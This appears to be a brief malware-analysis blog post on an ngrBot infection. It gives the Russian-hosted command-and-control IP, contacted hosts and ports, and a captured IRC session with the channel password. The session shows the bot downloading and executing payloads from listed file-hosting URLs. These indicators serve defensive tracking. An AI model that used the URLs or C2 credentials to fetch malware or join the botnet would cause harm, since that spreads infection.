46.17.96.36(ngrBot hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
199.101.133.68 80
199.15.234.7 80
70.38.98.238 80
46.17.96.36 1888 PASS strike

PRIVMSG #xp :[d=”http://img104.herosh.com/2011/10/21/2578445.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0
NICK n{US|XPa}eddkvsd
USER eddkvsd 0 0 :eddkvsd
JOIN #asdf strike
JOIN #XP
JOIN #US
PRIVMSG #xp :[d=”http://dc440.4shared.com/download/bSZjbmUZ/sfgdfsd966.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0

* The data identified by the following URLs was then requested from the remote web server:
o http://dc440.4shared.com/download/bSZjbmUZ/sfgdfsd966.exe
o http://api.wipmania.com/
o http://img104.herosh.com/2011/10/21/2578445.gif

hosting infos:
http://whois.domaintools.com/46.17.96.36

Categories: Uncategorized